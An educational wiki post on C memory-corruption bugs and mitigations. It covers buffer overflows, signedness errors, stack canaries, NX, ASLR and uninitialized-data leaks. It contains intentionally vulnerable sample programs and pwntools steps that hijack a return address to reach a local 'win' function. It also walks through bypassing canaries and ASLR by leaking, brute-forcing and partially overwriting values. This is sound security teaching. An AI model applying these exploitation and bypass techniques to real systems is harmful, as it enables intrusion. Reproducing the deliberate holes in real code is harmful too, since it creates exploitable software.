Memory Errors
Created On 19. Jun 2021
Updated: 2021-06-26 23:38:33.785475000 +0000
Created By: acidghost
In 1972, Dennis Ritchie created the C programming language. It was designed to make developers' lives easier by keeping code portable between computer architectures while still giving low-level control over memory access. C is in some sense assembly, but with register allocation done for us. It is still one of the most widely used languages at the time of writing and will stay relevant until all of the major operating systems are either rewritten or replaced. The issue of memory corruption was raised even before C was created. In 1968, Robert Graham asked in the paper "Protection in an information processing utility": what if a program allows someone to overwrite memory they are not supposed to? C allows exactly this and much more.
Compared to other programming languages, C trusts the developer. Many languages have protections: in Python, for example, accessing an index outside an array raises an error. C allows the access. It is possible to make this safe in C by wrapping the array in a structure that also stores its size, but the developer still has to remember to check that size on every access.
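The "array plus size" idea can be sketched in Python, where the check the C developer would have to write by hand is made explicit. The class name SizedBuffer and its store method are made up for this illustration.

```python
class SizedBuffer:
    """Array plus explicit size, similar to a C struct { char *data; size_t size; }."""

    def __init__(self, size: int) -> None:
        self.size = size
        self.data = bytearray(size)

    def store(self, index: int, value: int) -> None:
        # This is the check C never performs on its own.
        if not 0 <= index < self.size:
            raise IndexError(f"index {index} outside buffer of size {self.size}")
        self.data[index] = value


buf = SizedBuffer(16)
buf.store(15, 0x41)          # last valid slot
try:
    buf.store(16, 0x41)      # one past the end
    overflowed = True
except IndexError:
    overflowed = False       # the write was rejected
```

In C the second store would silently succeed and modify whatever lies behind the array.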
Remember the stack?
+----------------------+ <-- Maximum address of stack
| STACK |
+----------------------+
| local buffer |
+----------------------+
| local variable |
+----------------------+
| saved rbp |
+----------------------+
| return address |
+----------------------+
Lowest Memory
visuals from https://eugenekolo.com/blog/stack-ascii-visualization/
On the stack a lot of data is stored together and treated the same. What can happen? Well, there are a few things that can be exploited such as:
- a value that influences a condition
- a read pointer or offset that allows reading arbitrary memory
- a write pointer or offset that allows overwriting arbitrary memory
- a code pointer that allows redirecting program execution
This usually happens when unsafe functions such as gets, strcpy, or scanf are used without length limits, or when pointers are passed around without their size.
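The first item in the list can be modelled with a flat bytearray standing in for a stack frame. The layout (a 16-byte buffer directly followed by a 4-byte is_admin flag) and all names are assumptions for this sketch, not the layout of any real program.

```python
import struct

BUF_SIZE = 16
# Assumed layout: 16-byte buffer, directly followed by a 4-byte int flag.
frame = bytearray(BUF_SIZE + 4)


def unchecked_copy(dst: bytearray, data: bytes) -> None:
    """Copy the way gets/strcpy would: no check against the buffer size."""
    dst[0:len(data)] = data


def is_admin(mem: bytearray) -> bool:
    # The flag lives right behind the buffer.
    (flag,) = struct.unpack_from("<i", mem, BUF_SIZE)
    return flag != 0


before = is_admin(frame)
unchecked_copy(frame, b"A" * BUF_SIZE + b"\x01")   # 17 bytes into a 16-byte buffer
after = is_admin(frame)
```

A single extra byte is enough to flip the value that the condition depends on.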
Causes of corruption
Below are listed a few of the most common causes how memory can get overwritten or leaked.
1. Buffer Overflow
C does not implicitly track sizes. To avoid problems, the program itself has to keep track of them and check them. When a size is not checked, a buffer overflow can be triggered. Below is a simple program that reads up to 128 bytes into a buffer that can hold only 16.
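#include <fcntl.h>
#include <sys/sendfile.h>
#include <unistd.h>

/* Never called by the program itself; the exploit redirects execution here. */
void win(void) { sendfile(1, open("./flag", 0), 0, 128); }

void vuln(void)
{
    char small_buffer[16];
    read(0, small_buffer, 128); /* bug: up to 128 bytes into 16 */
}

int main(void) { vuln(); }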
After compiling with
gcc -fno-stack-protector -o buffer_overflow buffer_overflow.c
running it, and providing some long random input, you will see that the program crashes. Why? It was never designed to be free of bugs, but mainly because it reads more into the buffer than the buffer can actually hold. An input longer than 16 bytes spills over the end of the buffer and fills the stack with the provided data; once it is long enough to reach the saved return address, the program crashes. Now what does that mean? When the function returns, it jumps to whatever the overwritten return address now contains, which is data we provided, so we can return anywhere we want. If we return to the win function, it gets executed and leaks the flag. Well, let's do it!
So, we have a buffer that is 16 bytes long. The return address is located after it. Between the buffer and the return address there may still be some padding and other things on the stack, such as the saved rbp. From this we need to find the exact position of the return address.
Launch a debugger in pwntools like this
import pwn
r = pwn.gdb.debug("./buffer_overflow")
This launches the process with gdb attached.
Then continue the program in gdb, send it a cyclic pattern, and watch it crash.
r.send(pwn.cyclic(128))
In a cyclic pattern every short subsequence is unique, so any piece of it can be mapped back to its offset in the input.
After the crash, inspect the top of the stack with x/s $rsp
to see which part of the pattern the program tried to return to. Then with
pwn.cyclic_find("{here_goes_the_located_pattern_from_rsp}")
we see how many bytes into the input the return address lies (the first four characters of the located pattern are enough).
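To see why such a pattern locates the offset, here is a simplified stand-in for cyclic and cyclic_find using only the standard library. It is not the algorithm pwntools uses (pwntools generates a de Bruijn sequence); the triple-based pattern, the function names, and the assumed return address offset of 24 are illustrative only.

```python
import string


def pattern_create(length: int) -> bytes:
    """Build 'Aa0Aa1Aa2...' so that every 4-byte window occurs only once."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    raise ValueError("requested pattern is too long")


def pattern_find(pattern: bytes, chunk: bytes) -> int:
    """Return the offset of the first four bytes of chunk inside pattern."""
    return pattern.find(chunk[:4])


pattern = pattern_create(128)
RET_OFFSET = 24                                  # assumption: 16-byte buffer + 8-byte saved rbp
at_rsp = pattern[RET_OFFSET:RET_OFFSET + 8]      # what x/s $rsp would show after the crash
offset = pattern_find(pattern, at_rsp)
```

The bytes found at rsp lead straight back to the amount of padding needed in front of the return address.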
To confirm the offset, fill the input up to the return address with A's and the return address itself with B's:
r.send(b"A"*{the_size_of_bytes_until_the_return_address}+b"B"*{the_size_of_the_return_address_which_is_8})
Then take the address of the win function and convert it to its little-endian byte representation. Note that p64 expects an integer, not a string:
pwn.p64(0x{address_of_win})
Then overwrite the return address with the address of the win function:
r.send(b"A"*{the_size_of_bytes_until_the_return_address}+pwn.p64(0x{address_of_win}))
Then read the output, which should contain the flag from your local system, and hope there is no garbage instead:
r.readall()
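The payload built in the steps above can be sketched without pwntools. The p64 helper below mirrors what pwn.p64 does for a 64-bit value; OFFSET and WIN_ADDR are hypothetical values, to be replaced by what cyclic_find and the disassembly report on your machine.

```python
import struct

OFFSET = 24            # assumption: result of the cyclic_find step
WIN_ADDR = 0x401156    # hypothetical; take the real one from objdump or gdb


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes, as x86-64 stores addresses."""
    return struct.pack("<Q", value)


probe = b"A" * OFFSET + b"B" * 8          # return address becomes 0x4242424242424242
payload = b"A" * OFFSET + p64(WIN_ADDR)   # return address becomes win
```

The probe is only there to confirm the offset: if the crash shows the return address filled with B's, the padding is right.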
2. Signedness Mixups
The standard C library uses unsigned integers for sizes (the last argument to read, memcmp, etc.). The default integer types (short, int, long) are signed. Recall two's complement. Problems arise when signedness is mixed up. For example, see the program below:
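#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    int size;
    char buf[16];
    scanf("%i", &size);
    if (size > 16) exit(1); /* signed comparison: -1 passes */
    read(0, buf, size);     /* size is converted to an unsigned size_t here */
}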
Sending a negative number passes the check and causes a very large read. When the int -1 is converted to the unsigned size_t that read expects, it becomes the largest possible value: 2^64 - 1 (18446744073709551615) on 64-bit Linux, or 2^32 - 1 (4294967295) on a 32-bit build. If you strace the program, you can see this huge count in the read call after providing -1 as input.
While debugging, the read can be kept small by setting rdx (the register that holds the count) to 0xfff before the call. Simply put, if a size passes a signed check and is then used as an unsigned length, a negative value turns into a huge one.
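The conversion can be reproduced with plain integer arithmetic. The helper name as_size_t is made up for this sketch; it only models how a two's complement value is reinterpreted as unsigned.

```python
def as_size_t(value: int, bits: int = 64) -> int:
    """Reinterpret a signed integer as an unsigned one of the given width."""
    return value & ((1 << bits) - 1)


size = -1
passes_check = not (size > 16)        # the signed comparison from the C program
count_64 = as_size_t(size)            # what read() receives on 64-bit Linux
count_32 = as_size_t(size, bits=32)   # the same on a 32-bit build
```

A safer check would also reject negative values, or store the size in an unsigned type from the start.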
Mitigations
Below are the measures modern systems use to protect against memory corruption, why they are not always effective, and a few techniques for bypassing them.
1. Stack Canaries
Stack canaries mitigate buffer overflow attacks by placing a secret canary value on the stack between the local buffers and the saved return address. The value is checked before the function returns, which detects an overflow that ran over it. Compile the buffer overflow example from above with gcc -o buffer_overflow_canary buffer_overflow.c to leave the canary enabled (add -fstack-protector-all if your gcc does not enable it by default), then run checksec --file=buffer_overflow_canary to see which protections are enabled.
When crashing the program with an oversized input, the canary check can be seen after the read into the buffer, right before the call to the stack check handler.
Let's look at this more closely in the objdump disassembly.
The value in [rbp-0x8] is loaded into rcx and then xored with fs:0x28. The canary is stored in [rbp-0x8]. fs:0x28 is the reference value, kept in a hidden location that is addressed through the fs register. When the program starts, this value is initialized randomly, and at function entry it is copied onto the stack through rax. Before the function returns, the two values are xored and the following je instruction tests the zero flag: if the result is not zero (the canary changed), the stack overflow is detected. Our oversized input is written over [rbp-0x8], which alters the canary.
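The check described above can be modelled in a few lines. This is a simulation of the idea, not of the exact code gcc emits; the frame layout (16-byte buffer, 8-byte canary, saved rbp, return address) and the function name call_vuln are assumptions.

```python
import os

BUF, CANARY, RBP, RET = 16, 8, 8, 8    # assumed frame layout, low to high addresses


def call_vuln(data: bytes, reference: bytes) -> str:
    frame = bytearray(BUF + CANARY + RBP + RET)
    frame[BUF:BUF + CANARY] = reference            # prologue: copy the reference value to the stack
    frame[0:len(data)] = data                      # unchecked read into the buffer
    stored = int.from_bytes(frame[BUF:BUF + CANARY], "little")
    # Epilogue: xor the stored canary with the reference, continue only if the result is 0.
    if stored ^ int.from_bytes(reference, "little") != 0:
        return "stack smashing detected"
    return "returned normally"


reference = b"\x00" + os.urandom(7)                # leading null byte, 7 random bytes
fits = call_vuln(b"A" * 16, reference)             # stays inside the buffer
smashed = call_vuln(b"A" * 24, reference)          # runs over the canary
```

Even a single byte of overflow is caught here, because it replaces the canary's leading null byte.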
How to bypass stack canaries
Leaking stack canaries might seem easy, but this is not always the case. There are a few methods to get past the canary. Remember that each canary starts with a 0 byte.
1. Leak it
One way is to leak the canary through another vulnerability. However, this is very situational and depends on an appropriate vulnerability being present.
2. Brute Force
The canary is rerandomized only when a process starts. However, many processes fork themselves. In such processes, where a parent forks children, every child inherits the same canary, so it is possible to keep sending input and guess the canary one byte at a time: a wrong byte crashes the child, a correct one does not. Once all bytes are known, overwriting the canary with the same bytes bypasses the check.
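A minimal simulation of the byte-by-byte brute force follows. The function child_survives is a stand-in for one connection to a forking server that overflows exactly as many canary bytes as are being guessed; against a real target this would be a network round trip, and the names here are made up.

```python
import os

SECRET = b"\x00" + os.urandom(7)     # same canary in the parent and in every forked child


def child_survives(guess_prefix: bytes) -> bool:
    """Stand-in for one attempt: the child only survives if every overwritten byte matches."""
    return SECRET[:len(guess_prefix)] == guess_prefix


def brute_force_canary():
    known = b"\x00"                  # the first byte is always null
    attempts = 0
    while len(known) < 8:
        for candidate in range(256):
            attempts += 1
            if child_survives(known + bytes([candidate])):
                known += bytes([candidate])
                break
    return known, attempts


recovered, attempts = brute_force_canary()
```

Guessing one byte at a time needs at most 7 * 256 attempts, instead of the 2^56 a blind guess of all seven unknown bytes would require.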
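3. Jump it
The program below reads one byte at a time and writes it to buf at offset i.
#include <unistd.h>

int main(void) {
    char buf[16];
    int i;
    for (i = 0; i < 128; i++) read(0, buf + i, 1);
}
When the overflow reaches the integer i itself, the attacker controls where the next byte is written. By setting i so that it points just past the canary, the following writes jump over the canary and continue at the saved return address, leaving the canary untouched.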
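The jump can be simulated on a bytearray. The layout below (buf, then i, then padding, canary, saved rbp, return address) is an assumption chosen to match the description; a real compiler may place i elsewhere. The target address is hypothetical.

```python
# Assumed layout (low to high): buf[16], int i, 4 bytes padding,
# canary[8], saved rbp[8], return address[8].
BUF, I_OFF, CANARY_OFF, RET_OFF, FRAME = 16, 16, 24, 40, 48


def run_loop(payload: bytes, canary: bytes) -> bytearray:
    frame = bytearray(FRAME)
    frame[CANARY_OFF:CANARY_OFF + 8] = canary
    stream = iter(payload)

    def get_i() -> int:
        return int.from_bytes(frame[I_OFF:I_OFF + 4], "little", signed=True)

    def set_i(value: int) -> None:
        frame[I_OFF:I_OFF + 4] = value.to_bytes(4, "little", signed=True)

    set_i(0)
    while get_i() < 128:
        byte = next(stream, None)
        if byte is None:            # input exhausted
            break
        frame[get_i()] = byte       # read(0, buf + i, 1)
        set_i(get_i() + 1)          # i++
    return frame


canary = b"\x00SECRET!"
target = (0x401136).to_bytes(8, "little")                     # hypothetical address
payload = b"A" * BUF + bytes([RET_OFF - 1]) + target          # byte 17 rewrites i
frame = run_loop(payload, canary)
```

The seventeenth byte sets i to 39, the loop increments it to 40, and the next eight bytes land on the return address while the canary keeps its value.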
2. No-Execute (NX)
In Shellcoding, we made the .text segment executable. The NX bit is responsible for marking which memory regions may be executed and which may not. When compiling a program with gcc, the stack can be made executable with the -z execstack flag or non-executable with -z noexecstack.
Also see:
https://en.wikipedia.org/wiki/Executable_space_protection
https://en.wikipedia.org/wiki/NX_bit
3. Address Space Layout Randomization (ASLR)
With ASLR, code and data are loaded at random locations, so pointers take different values on every run. This way an attacker cannot simply hardcode an address to point to anything they want. ASLR randomizes everything except the three least significant nibbles of a memory address. It was introduced by PaX in 2001. PaX is led by an anonymous coder, and the project has released many patches for the Linux kernel.
How to deal with ASLR
There are various methods to deal with it. As with the canary, an address can be leaked or brute forced. Another approach is to overwrite only the page offset of a pointer, since mappings are page aligned. Pages are always aligned to 0x1000.
Because of this alignment, the last three nibbles of an address never change. A pointer can only be overwritten in whole bytes, so overwriting its two least significant bytes also overwrites one randomized nibble, which has to be brute forced. Since a nibble can take 16 values, this is a feasible brute force. Let's return to the first example in this post.
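The nibble arithmetic can be checked with a short sketch that walks through all 16 possible values of the randomized nibble. The offsets of win and of the original return address are hypothetical, and the base addresses are illustrative.

```python
PAGE = 0x1000
WIN_OFFSET = 0x1189     # hypothetical offset of win inside the binary
RET_OFFSET = 0x11C4     # hypothetical offset of the original return address


def partial_overwrite(pointer: int, low16: int) -> int:
    """Replace only the two least significant bytes of a pointer."""
    return (pointer & ~0xFFFF) | low16


guess = 0x5189          # fixed low 12 bits of win plus one guessed nibble
hits = []
for nibble in range(16):
    base = 0x555555550000 + nibble * PAGE        # page-aligned load address
    ret = base + RET_OFFSET
    win = base + WIN_OFFSET
    assert win & 0xFFF == WIN_OFFSET & 0xFFF     # the page offset never changes
    if partial_overwrite(ret, guess) == win:
        hits.append(hex(base))
```

Exactly one of the 16 bases makes the guess correct, so a real attempt succeeds on average once in 16 runs.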
We call vuln directly from main so that the return address saved in vuln points back into main, inside our own binary. The return address of main itself points into libc, because libc is what calls main at startup. Compiling without PIE turns off randomization of the binary's load address:
gcc -fno-stack-protector -no-pie -o buffer_overflow buffer_overflow.c
Compile like this with PIE and without stack protection (which helps in debugging):
gcc -fno-stack-protector -o buffer_overflow buffer_overflow.c
Compare the addresses of both builds in objdump with objdump -M intel -d buffer_overflow.
You will notice that in the first build the addresses are always the same, while in the second there are only offsets, relative to wherever the program will be loaded in memory.
So let's now redirect the return into main to win instead, so that when vuln returns we jump straight to win. In objdump, we can see that the two addresses differ in only one byte. gdb disables ASLR automatically if it has permission to do so. You will notice that whenever a program is launched in gdb with randomization disabled, the base address is 0x555555554000. Note that this differs between architectures. If you are running in a VM, on a Mac, or on a 32-bit Linux machine, you might need to take extra steps to disable ASLR when launching the program. Also see:
https://stackoverflow.com/questions/1455904/how-to-disable-address-space-randomization-for-a-binary-on-linux
https://askubuntu.com/questions/318315/how-can-i-temporarily-disable-aslr-address-space-layout-randomization
Run in gdb and break at the first instruction of vuln. Using b *vuln stops before the function prologue, while rsp still points at the return address.
gdb ./buffer_overflow
b *vuln
r
Disassemble vuln and win to see the addresses. At this point rsp points at the saved return address into main, so overwrite its least significant byte with that of win:
set *(unsigned char *)$rsp = 0x{the_rightmost_2_nibbles_of_the_win_address}
The addresses might differ in your disassembly, so the value will differ too.
Check the return address with x/gx $rsp.
The same can be done in pwntools:
import pwn
r = pwn.process("./buffer_overflow")
r.write(b"A"*{size_of_padding}+b"\x{the_rightmost_2_nibbles_of_the_win_address}")
r.clean()
The size of the padding can vary, but you can always probe for it, starting from about 18 bytes. In pwntools, ASLR can be disabled locally with:
pwn.process("./buffer_overflow", aslr=False)
or in bash:
$ setarch x86_64 -R /bin/bash
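The one-byte overwrite works because x86-64 stores addresses in little-endian order, so the first byte in memory is the least significant one. A small sketch with hypothetical addresses:

```python
import struct

ret_into_main = 0x5555555551C4    # hypothetical saved return address
win = 0x555555555189              # hypothetical address of win

stack_bytes = bytearray(struct.pack("<Q", ret_into_main))   # as stored on the stack
stack_bytes[0] = win & 0xFF                                  # overwrite only the first byte
(new_ret,) = struct.unpack("<Q", stack_bytes)
```

This is also why the raw byte has to be sent: the ASCII text "0x89" would overwrite four bytes with the characters '0', 'x', '8', and '9'.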
Memory Disclosure
As described above, there are measures that tighten security and reduce an attacker's chance of corrupting memory. However, as in the examples above, these measures depend on secrets: if the canary value leaks, or if it becomes known where the pointers mapped by ASLR point, the protection is lost. Such leaks are memory disclosures.
1. Buffer Overread
Similar to a buffer overflow on write, a buffer overread leaks data because the program reads more from a buffer than the buffer actually holds.
2. Termination
If a buffer holds uninitialized values and the program treats its contents as a string, an input that fills the buffer completely leaves no room for the terminator, so printing the string also leaks whatever follows it on the stack. The solution is to null-terminate strings; however, people often forget to do this. This is also why the canary starts with a null byte: it is a safeguard against forgotten null termination after a read.
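The effect of a missing terminator, and of the canary's leading null byte, can be shown with a stand-in for a C string print. The memory layout (name, then a secret, then the canary) and the helper c_puts are assumptions for this sketch.

```python
def c_puts(memory: bytes, start: int) -> bytes:
    """Return what puts() would print: everything up to the first null byte."""
    end = memory.index(b"\x00", start)
    return memory[start:end]


# Assumed layout: name[8], secret[8], canary[8].
name = b"AAAAAAAA"                                    # fills the buffer, no terminator
secret = b"hunter22"
canary = b"\x00" + b"\x9f\x3c\x51\xe0\x7a\x12\xb4"    # leading null byte
memory = name + secret + canary

leaked = c_puts(memory, 0)
```

The secret is printed together with the name, but the print stops at the canary's first byte, so the random part of the canary stays hidden.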
3. Uninitialized Data
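Compiler optimizations remove writes to data that is never read again. This matters in crypto implementations, for example, where secrets are wiped after use. From the compiler's point of view, why keep a store to a variable that will never be used?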
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
void foo(void) { char foo_buffer[64]; read(open("flag", 0), foo_buffer, 64); memset(foo_buffer, 0, 64); }
void bar(void) { char bar_buffer[64]; write(1, bar_buffer, 64); }
int main(void) { foo(); bar(); }
Compile with optimizations enabled: gcc -o unit unit.c -O3 -fno-inline
Disassemble it with objdump -M intel -d unit and see that the call to memset was removed.
At this point even languages like Rust, which were built with the idea of being secure against memory errors, can become vulnerable. To meet certain criteria, security measures are often left out.
The solution to this is to initialize the buffer:
void bar() { char bar_buffer[64] = {0}; write(1, bar_buffer, 64); }
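The stack reuse behind this leak can be modelled with one shared bytearray that stands in for the frame slot both functions use. The flag value and the parameters memset_kept and initialize are made up for this sketch.

```python
STACK = bytearray(64)                 # one stack slot that foo and bar both reuse
FLAG = b"flag{example}"               # placeholder secret


def foo(flag: bytes, memset_kept: bool) -> None:
    STACK[:len(flag)] = flag          # read(open("flag", 0), foo_buffer, 64)
    if memset_kept:                   # the optimizer may drop this step
        STACK[:] = bytes(len(STACK))


def bar(initialize: bool) -> bytes:
    if initialize:                    # char bar_buffer[64] = {0};
        STACK[:] = bytes(len(STACK))
    return bytes(STACK)               # write(1, bar_buffer, 64)


foo(FLAG, memset_kept=False)
leaked = bar(initialize=False)        # uninitialized buffer still holds the flag

foo(FLAG, memset_kept=False)
fixed = bar(initialize=True)          # initialized buffer prints only zeros
```

Initializing the buffer in bar protects the output even when the wipe in foo has been optimized away.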
References and Further Reads
https://pwn.college/modules/memory
http://scottmcpeak.com/memory-errors/
https://mcuoneclipse.com/2019/09/28/stack-canaries-with-gcc-checking-for-stack-overflow-at-runtime/
https://bananamafia.dev/post/binary-canary-bruteforce/
https://security.stackexchange.com/questions/47807/nx-bit-does-it-protect-the-stack
https://www.win.tue.nl/~aeb/linux/hh/protection.html
https://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx
Section: Binary Exploitation (PWN)